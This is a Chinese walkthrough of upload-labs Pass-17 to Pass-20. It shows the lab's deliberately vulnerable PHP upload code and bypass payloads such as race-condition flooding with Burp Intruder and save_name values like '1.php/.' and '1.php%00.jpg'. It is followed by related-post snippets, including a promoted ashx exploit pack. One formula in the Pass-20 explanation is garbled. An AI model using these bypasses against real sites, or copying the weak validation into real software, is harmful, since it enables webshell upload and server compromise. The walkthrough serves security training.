  2. 将保存下来经过服务器二次渲染的那张jpg图片,用此脚本进行处理生成payload.jpg

  3. 然后再上传payload.jpg

Pass-17 利用竞争条件绕过

代码
1234567891011121314151617181920212223
$is_upload = false;$msg = null;if(isset($_POST['submit'])){    $ext_arr = array('jpg','png','gif');    $file_name = $_FILES['upload_file']['name'];    $temp_file = $_FILES['upload_file']['tmp_name'];    $file_ext = substr($file_name,strrpos($file_name,".")+1);    $upload_file = UPLOAD_PATH . '/' . $file_name;    if(move_uploaded_file($temp_file, $upload_file)){        if(in_array($file_ext,$ext_arr)){             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;             rename($upload_file, $img_path);             $is_upload = true;        }else{            $msg = "只允许上传.jpg|.png|.gif类型文件!";            unlink($upload_file);        }    }else{        $msg = '上传出错!';    }}
绕过方式

查看源码,发现是个条件竞争,上传成功的文件会被重命名,而上传失败的文件会先保存在upload目录中、然后再调用unlink()删除该不合法的上传文件:

代码存在条件竞争问题,非法文件上传后会先保存在upload目录中,然后再调用unlink()函数来删除,在这中间的时间差中,我们可以不断上传和访问非法的PHP文件,速度够快时就能触发成功。

用burp开启两个intruder模块,一个用于重复上传,另一个用于重复访问。

Step1:先设置上传请求,Burp拦截到上传文件的数据包后发送到Intruder模块,因为此处没有什么参数需要爆破,只是需要重复发起请求,所以payload设置为Null payloads,设置访问次数5000次,线程50个。

Step2:接下来设置访问请求,浏览器构造请求url:http://127.0.0.1/upload-labs-master/upload/miracle778.php,进行访问,然后用burp抓包后发送至intruder模块,设置payload,这一步和上传请求设置差不多,都是Null payloads、5000次、50个线程。

Step3:设置好两个模块后同时启动,观察结果,因为我们传入的php代码是phpinfo();,所以如果访问成功的话,会返回php的配置信息。

Pass-18 利用竞争条件+解析漏洞绕过

myupload.php中保存文件的路径的代码是写得有点问题的,并不会将文件保存在upload目录中,原因是保存路径的字符串在拼接时少了个斜杠/,因此可自行在myupload.php的setDir()函数中将cls_upload_dir变量对应的语句加个斜杠即可:

1
$this->cls_upload_dir = $dir.'/';
代码

index.php

123456789101112131415161718192021222324252627282930313233343536373839
$is_upload = false;$msg = null;if (isset($_POST['submit'])){    require_once("./myupload.php");    $imgFileName =time();    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);    $status_code = $u->upload(UPLOAD_PATH);    switch ($status_code) {        case 1:            $is_upload = true;            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;            break;        case 2:            $msg = '文件已经被上传,但没有重命名。';            break;        case -1:            $msg = '这个文件不能上传到服务器的临时文件存储目录。';            break;        case -2:            $msg = '上传失败,上传目录不可写。';            break;        case -3:            $msg = '上传失败,无法上传该类型文件。';            break;        case -4:            $msg = '上传失败,上传的文件过大。';            break;        case -5:            $msg = '上传失败,服务器已经存在相同名称文件。';            break;        case -6:            $msg = '文件无法上传,文件不能复制到目标目录。';            break;        default:            $msg = '未知错误!';            break;    }}

myupload.php

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576
class MyUpload{..................  var $cls_arr_ext_accepted = array(      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",      ".html", ".xml", ".tiff", ".jpeg", ".png" );..................  /** upload()   **   ** Method to upload the file.   ** This is the only method to call outside the class.   ** @para String name of directory we upload to   ** @returns void  **/  function upload( $dir ){    $ret = $this->isUploadedFile();    if( $ret != 1 ){      return $this->resultUpload( $ret );    }    $ret = $this->setDir( $dir );    if( $ret != 1 ){      return $this->resultUpload( $ret );    }    $ret = $this->checkExtension();    if( $ret != 1 ){      return $this->resultUpload( $ret );    }    $ret = $this->checkSize();    if( $ret != 1 ){      return $this->resultUpload( $ret );    }    // if flag to check if the file exists is set to 1    if( $this->cls_file_exists == 1 ){      $ret = $this->checkFileExists();      if( $ret != 1 ){        return $this->resultUpload( $ret );      }    }    // if we are here, we are ready to move the file to destination    $ret = $this->move();    if( $ret != 1 ){      return $this->resultUpload( $ret );    }    // check if we need to rename the file    if( $this->cls_rename_file == 1 ){      $ret = $this->renameFile();      if( $ret != 1 ){        return $this->resultUpload( $ret );      }    }    // if we are here, everything worked as planned :)    return $this->resultUpload( "SUCCESS" );  }..................};
绕过方式

审计给出来的代码,看到有个条件竞争问题,即程序先上传文件再重命名文件, 但如果只能上传图像文件而没有文件包含漏洞也不能getshell,但是后缀名过滤的白名单中包含了zip、7z、rar等Apache不能解析的后缀名,所以我们可以利用竞争条件+解析漏洞绕过。

利用过程和Pass-17一样,只是这次上传的文件后缀是.php.7z

Pass-19 利用\.绕过

代码
12345678910111213141516171819202122232425
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");        $file_name = $_POST['save_name'];        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);        if(!in_array($file_ext,$deny_ext)) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH . '/' .$file_name;            if (move_uploaded_file($temp_file, $img_path)) {                $is_upload = true;            }else{                $msg = '上传出错!';            }        }else{            $msg = '禁止保存为该类型文件!';        }    } else {        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';    }}

这里关于pathinfo的说明如下图:

绕过方式

文件名是通过POST方式传入的,然后通过黑名单过滤文件后缀名,最后直接用文件名拼接保存的文件路径上传上去。这关的绕过方法就很多了:

  • 0x00截断

  • 点绕过

  • ::$DATA绕过

  • 空格绕过

  • 大小写绕过

  • Apache解析漏洞绕过

这些都是之前关卡都用过的绕过方式,这里明显是考察别的知识点。于是网上找找别人的答案,发现考点是:move_uploaded_file会忽略掉文件末尾的/.,所以可以构造save_path=1.php/.,这样file_ext值就为空,就能绕过黑名单,而move_uploaded_file函数忽略文件末尾的/.可以实现保存文件为.php。

绕过文件名后缀:

  • post: save_name = 1.php%00.jpg

  • post: save_name = 1.php/.、

Pass-20 数组+\.绕过

代码
123456789101112131415161718192021222324252627282930313233
$is_upload = false;$msg = null;if(!empty($_FILES['upload_file'])){    //检查MIME    $allow_type = array('image/jpeg','image/png','image/gif');    if(!in_array($_FILES['upload_file']['type'],$allow_type)){        $msg = "禁止上传该类型文件!";    }else{        //检查文件名        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];        if (!is_array($file)) {            $file = explode('.', strtolower($file));        }        $ext = end($file);        $allow_suffix = array('jpg','png','gif');        if (!in_array($ext, $allow_suffix)) {            $msg = "禁止上传该后缀文件!";        }else{            $file_name = reset($file) . '.' . $file[count($file) - 1];            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH . '/' .$file_name;            if (move_uploaded_file($temp_file, $img_path)) {                $msg = "文件上传成功!";                $is_upload = true;            } else {                $msg = "文件上传失败!";            }        }    }}else{    $msg = "请选择要上传的文件!";}

  • reset()函数:将内部指针指向数组中的第一个元素,并输出。

  • end()函数:将数组内部指针指向最后一个元素,并返回该元素的值(如果成功)。

  • explode()函数:把字符串打散为数组。

绕过方式

先理清一下函数做了什么操作:

函数执行流程:文件名通过POST方式提交—>MIME白名单校验—>文件后缀白名单校验—>获取文件名拼接到上传的路径。具体而言:

以POST方式上传save_name时,程序会将该参数作为文件名;接着判断该文件名参数save_name是否为数组,若不是则直接.来切分为数组形式;ext变量是调用end()函数取数组最后的一个元素的值,若文件名参数save_name不是数组当然是正常的后缀名,但是若文件名参数save_name是数组则取的就是save_name中最后一个元素值;ext和白名单判断过滤后,通过reset()函数获取文件名,若文件名参数save_name不为数组、此时当然就是正常的文件名,但若文件名参数save_name为数组,则是取save_name中第一个元素值;而最后上传文件的后缀名是直接拼接该语句的值$file[count($file) - 1]即将最后一个元素值作为后缀名。

分析到这里,绕过的关键思路就是:end($file)是jpg、png、gif,而$file最后一个元素是php。

这里可以构造save_name[0] = 1.php/,save_name[2] = jpg,这样的话end(file)为jpg,而`file)为jpg,而‘file[count(file) - 1]`为file)−1]‘为file[1]为空。所以最终file_name=1.php/.,到这里就跟Pass-19一样了。

f73b80ba61ba2be806a8338730b39092.png

文件上传漏洞总结

漏洞类型分类

e34dd4ba45213edecc09131f0e4c78a7.png

漏洞类型判断方式

abc6086ccc64369ad261c9eef740f7d6.png

Reference

项目地址:https://github.com/c0ny1/upload-labs

Upload-labs WriteUp

作者:ca0y1h's Blog

原文:https://ca0y1h.top/

weixin_39562197
关注
ashx漏洞福利包
04-04
网上能找到的ashx漏洞都在这里了。亲测可用。不要积分。不喜勿喷。
ashx文件 验证是否登录_【文件上传漏洞uploadlabs pass121
weixin_39929687的博客
11-27 201
什么是upload-labs:upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞一个全面的了解。目前一共21关,每一关都包含着不同上传方式。文件上传漏洞思维导图:0x01 前端验证后端代码:<script type="text/javascript">function checkFile() {var...
漏洞复现」方天云智慧平台系统 Upload.ashx 任意文件上传漏洞
最新发布
qq_39894062的博客
08-05 486
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
ashx基类:判断是否登录
01-07 1171
因为ashx少了页面元素,所以在效率上比aspx页面要稍微好一些,所以我们经常都当作AJAX提交页来处理程序。 大家都知道,在ashx里面使用Session需要实现IRequiresSessionState接口。有时候我们需要判断此页面处理的请求是否是合法请求,比如说是登陆后的用户才可以请求,通常情况下都是通过Session来判断。但是每个界面写一个Session判断未免有显得太过于麻烦,所
ashx上传绕过
xiaoshan812613234的专栏
12-17 1488
上传类型添加ashx类,上传一个ashx文件,a.ashx,代码如下: using System; using System.Web; using System.IO; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentT
ashx验证是否登陆、是否有操作权限的基类
04-02
在一般处理程序(ashx)中验证用户是否登陆、是否对当前操作有读、写、删、改权限的基类。在其他ashx中只需要继承相应权限的基类,无需另写代码实现。
java web 上传图片漏洞_Web安全:文件上传漏洞
weixin_29310631的博客
02-17 1123
原标题:Web安全:文件上传漏洞一般将文件上传归类为直接文件上传与间接文件上传。直接文件上传就是服务器根本没有做任何安全过滤,导致攻击者可以直接上传小马文件及大马文件(如ASP、ASPX、PHP、JSP及war文件等类型的小马文件及大马文件),从而得到目标站点的shell。间接文件上传就是服务器对用户上传文件使用了安全策略:第一种安全策略是在程序代码中设置黑名单或者白名单;第二种安全策略是在We...
asp.net利用ashx文件实现文件上传功能
10-15
在ASP.NET中,实现文件上传功能是Web应用中常见的需求,可以用来允许用户上传图片、文档等文件到服务器。本文将详细介绍如何利用ASHX(HTTP Handler)文件来处理文件上传,包括两种不同的方法:传统的表单提交和使用...
ashx文件的使用小结
10-26
ashx" type="text/javascript"></script>ASHX文件是ASP.NET中的一种特殊类型的Web处理程序,全称为HTTP Handler。它与ASPX页面不同,ASPX用于创建动态网页,而ASHX文件主要用于处理特定的HTTP请求,如数据传输、图片...
ashx 获取上传文件_C#——文件上传(一般处理程序ashx
weixin_39622283的博客
12-19 551
usingSystem;usingSystem.IO;usingSystem.Collections.Generic;usingSystem.Linq;usingSystem.Web;usingReligionServer.util;usingReligionServer.Model;usingReligionServer.service;usingSystem.Text.RegularExpre...
智明OA漏洞学习——EmailDownload.ashx 任意文件下载漏洞
记录并分享学习安全的知识点..
05-02 7385
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 验证poc如下: 一、概述 智明 SmartOA EmailDownload.ashx文件存在任意文件下载漏洞,通过漏洞可下载服务器上的敏感文件,查看敏感信息。 二、影响版本 智明SmartOA产品,影响版本不详。 三、漏洞复现 验证poc如下: /file/EmailDownload.ashx?url=~/web.config&name=w...
upload_ajax.ashx
11-03
upload_ajax.ashx用于图片上传初始化,webuploader,kindeditor等
广联达Linkworks 多处 XML实体注入漏洞复现
0xSec
01-08 1523
​广联达 LinkWorks /GB/LK/Document/DataExchange/DataExchange.ashx、/Mail/Services/EmailAccountOrgUserService.asmx/GetUserCodesByOrgCodes等接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 1017
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
ashx PHP文件 优劣,ashx文件如何控制安全性
weixin_35520863的博客
03-18 208
如果你这个服务是只针对网站的注册用户及登录才可以使用的话,那肯定简单,只要对状态判断下就好了!第一种:但如果无状态的连接的话,你可以用ip来限制,通过配置在配置文件里配置自己的机器的ip,这样就可以防止了!如果只有自己的服务器可以访问,你可以直接配置成内网的ip,这样没法伪造了!第二种:session ashx中默认不能使用session, HttpContext.Current.Session ...
文件上传(包括编辑器上传漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
qq_53058639的博客
03-28 1198
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…由于服务器认为上传的是JPEG图片,所以文件将被放行,即使上传的实际是一个可执行的PHP脚本,也将被视为正常的图片文件
Asp.net jQuery与ashx 安全性问题
风过无声
07-05 2304
可以在ashx中使用session验证ashx中要获取session内容还需如下几步: ①导入命名空间 using System; using System.Web; using System.Web.SessionState; //第一步:导入此命名空间
文件上传漏洞(三)
不秃头的程序Yang
05-21 345
四、绕过黑名单上传 1、简介 上传模块,有时候会写成黑名单限制,在上传文件的时获取后缀名,再把后缀名与程序中黑名单进行检测,如果后缀名在黑名单的列表内,文件将禁止文件上传。 2、代码分析 首先是检测 submit 是否有值,获取文件的后缀名,进行黑名单对比,后缀名不在黑名单内,允许上传。 3、上传攻击 上传图片时,如果提示不允许 php、asp 这种信息提示,可判断为黑名单限制,上传黑名单以外的后缀名即可。 在 iis 里 asp 禁止上传了,可以上传 asa cer cdx 这些后缀,如在网站里允许
ashx获取input file 文件_文件上传(Web漏洞及防御)
weixin_39594191的博客
01-02 248
文件上传Web应用的必备功能之一!如果服务器配置不当或者没有进行足够的过滤,Web ⽤户就可以上传任意⽂件,包括恶意脚本⽂件,exe 程序等等,这就造成了⽂件上传漏洞漏洞的成因服务器配置不当Web 应⽤开放了文件上传功能,没有对上传的⽂件做⾜够的限制和过滤。在程序开发部署时,没有考虑到系统的特性或组件的漏洞,从⽽导致限制被绕过漏洞危害上传漏洞最直接的威胁就是上传任意⽂件,包括恶意脚本、程序等...
IIS容器支持的上传文件类型扩展名探测
当你在使用工具如Burp Suite进行文件上传漏洞的测试时,了解IIS支持的这些扩展名有助于识别哪些文件类型能够成功上传并可能被服务器处理。 1. **Web Forms (.aspx, .ascx, .ashx, .asmx)**: 这些是ASP.NET的常见...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值